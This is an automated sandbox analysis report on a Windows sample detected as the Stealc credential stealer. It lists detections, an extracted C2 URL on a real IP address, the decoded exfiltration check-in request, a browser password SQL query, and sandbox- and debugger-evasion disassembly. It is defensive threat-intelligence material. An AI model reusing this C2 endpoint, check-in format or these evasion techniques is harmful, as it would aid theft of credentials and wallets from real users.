
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523113
MD5: fa42e6e289aa71b35af21bb42409f81f
SHA1: e44dcb353f84af8e6c81ebb6654945898b7fbedd
SHA256: c17afe930719ca7861323d6e6fd2a8c59db8db0bce6ae487078d842105a830d7
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FA42E6E289AA71B35AF21BB42409F81F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6928 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6928 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.d30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T05:33:02.479402+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.d30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phps | Virustotal: Detection: 16%
Source: http://185.215.113.37/U | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpC | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D39B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data (decoded from the report's raw hex dump; CRLF line endings):
  ------DHCBGDHIEBFHCBFHDHDH
  Content-Disposition: form-data; name="hwid"

  92B6944F37144293944220
  ------DHCBGDHIEBFHCBFHDHDH
  Content-Disposition: form-data; name="build"

  doma
  ------DHCBGDHIEBFHCBFHDHDH--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/U
Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01078039
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D2033
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F2317
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007347
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FDCAAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01077390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106C246
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F3D54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F15BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF86B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116C797
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00D345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: eruzhrvr ZLIB complexity 0.9949714991541064
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5; instr diversity: 0.5
Source: file.exe, 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YDL0WP9K.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;O
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1820672 > 1048576
Source: file.exe | Static PE information: Raw size of eruzhrvr is bigger than: 0x100000 < 0x196600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eruzhrvr:EW;ewcbbuan:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eruzhrvr:EW;ewcbbuan:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bcae1 should be: 0x1bf579
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: eruzhrvr
Source: file.exe | Static PE information: section name: ewcbbuan
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106010D push 308791EEh; mov dword ptr [esp], esi | 0_2_01060128
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A412B push eax; mov dword ptr [esp], 00000000h | 0_2_010A415C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A412B push esi; mov dword ptr [esp], edi | 0_2_010A41F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A412B push ebx; mov dword ptr [esp], edx | 0_2_010A4219
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A412B push 657EAEE0h; mov dword ptr [esp], edi | 0_2_010A4242
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0117595A push 456050A1h; mov dword ptr [esp], ebp | 0_2_01175977
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118A941 push edi; mov dword ptr [esp], ebx | 0_2_0118A968
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118A941 push edx; mov dword ptr [esp], 2EF122B8h | 0_2_0118A983
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111D171 push ecx; mov dword ptr [esp], 5597C941h | 0_2_0111D1A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111D171 push esi; mov dword ptr [esp], ebp | 0_2_0111D1FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011CC97E push 4421FFF4h; mov dword ptr [esp], ebp | 0_2_011CCAE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push 6D29D20Dh; mov dword ptr [esp], esp | 0_2_010F99B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push 1CE76E31h; mov dword ptr [esp], ebx | 0_2_010F9A5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push edx; mov dword ptr [esp], 787CBBB6h | 0_2_010F9A64
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push ecx; mov dword ptr [esp], eax | 0_2_010F9AA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push 18AA9848h; mov dword ptr [esp], ebx | 0_2_010F9ACC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push ecx; mov dword ptr [esp], 5FFF4A69h | 0_2_010F9AF5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push ecx; mov dword ptr [esp], ebp | 0_2_010F9B61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push ebx; mov dword ptr [esp], eax | 0_2_010F9C4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push ecx; mov dword ptr [esp], esp | 0_2_010F9CC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push 22B235D2h; mov dword ptr [esp], eax | 0_2_010F9D3C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push 1A755E40h; mov dword ptr [esp], ebp | 0_2_010F9E01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push eax; mov dword ptr [esp], ecx | 0_2_010F9E0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F9967 push eax; mov dword ptr [esp], 3CFFEFC5h | 0_2_010F9EE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push 6DBEAB9Bh; mov dword ptr [esp], edx | 0_2_010FD978
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push 5F080A0Ah; mov dword ptr [esp], eax | 0_2_010FDA01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push 7DB008ACh; mov dword ptr [esp], ebx | 0_2_010FDA13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push edi; mov dword ptr [esp], ebx | 0_2_010FDACC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push ebx; mov dword ptr [esp], ecx | 0_2_010FDB8E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push edx; mov dword ptr [esp], eax | 0_2_010FDBAD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD967 push eax; mov dword ptr [esp], esi | 0_2_010FDBEB
Source: file.exe | Static PE information: section name: eruzhrvr entropy: 7.953491932636083

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13267)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F91A9B second address: F91AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F43F0D1038Ch 0x00000011 ja 00007F43F0D10386h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1103C5E second address: 1103C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F386E second address: 10F3873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1102BE0 second address: 1102BF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F43F0D0DC66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d je 00007F43F0D0DC66h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1102D57 second address: 1102D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110304E second address: 110306F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F43F0D0DC66h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43F0D0DC73h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11031D9 second address: 11031FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43F0D10393h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jc 00007F43F0D10386h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11031FD second address: 1103210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43F0D0DC6Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1103363 second address: 110337A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43F0D10386h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F43F0D1038Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110337A second address: 1103384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43F0D0DC66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1103384 second address: 1103388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1103388 second address: 110338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110338E second address: 1103397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1103397 second address: 110339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1104E23 second address: F91A9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F43F0D10386h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 71FB6D66h 0x00000013 mov dl, FDh 0x00000015 push dword ptr [ebp+122D08D9h] 0x0000001b mov edx, 3868ACA1h 0x00000020 call dword ptr [ebp+122D206Bh] 0x00000026 pushad 0x00000027 cmc 0x00000028 xor eax, eax 0x0000002a sub dword ptr [ebp+122D1973h], edi 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D1973h], ecx 0x0000003a mov dword ptr [ebp+122D3988h], eax 0x00000040 xor dword ptr [ebp+122D182Bh], eax 0x00000046 mov esi, 0000003Ch 0x0000004b sub dword ptr [ebp+122D182Bh], ebx 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 clc 0x00000056 jmp 00007F43F0D10395h 0x0000005b lodsw 0x0000005d cld 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 jmp 00007F43F0D1038Bh 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b jmp 00007F43F0D1038Ah 0x00000070 pushad 0x00000071 sbb cx, B6DCh 0x00000076 or ebx, 1E8EF24Ch 0x0000007c popad 0x0000007d nop 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1104E91 second address: 1104E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1104E95 second address: 1104E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1104E99 second address: 1104E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1104E9F second address: 1104EA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104EA4 second address: 1104F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 7D2FB6DEh 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F43F0D0DC68h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F43F0D0DC68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 jng 00007F43F0D0DC68h 0x0000004c mov edx, ebx 0x0000004e mov dword ptr [ebp+122D1A1Ch], eax 0x00000054 mov ecx, dword ptr [ebp+122D3948h] 